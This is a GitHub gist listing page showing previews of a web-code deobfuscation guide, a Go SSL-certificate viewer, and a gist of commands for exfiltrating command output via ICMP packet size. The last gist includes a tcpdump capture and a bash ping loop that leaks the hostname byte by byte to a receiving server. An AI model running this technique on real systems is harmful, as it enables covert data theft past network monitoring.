Skip to content

Instantly share code, notes, and snippets.

View lc's full-sized avatar
💻
probably hitting my head on a desk

Corben Leo lc

💻
probably hitting my head on a desk
View GitHub Profile
@0xdevalias
0xdevalias / _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active November 17, 2024 17:02
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@003random
003random / SSL_CERT_INFO.go
Last active June 25, 2019 18:34
Displays SSL Certificate Info. Every property is either a string or a int. No objects, for easy storing.
package main
import (
"fmt"
"os"
"net"
"bytes"
"strings"
"encoding/pem"
"crypto/tls"
@jobertabma
jobertabma / icmp.md
Last active September 14, 2022 15:02
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
  1. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done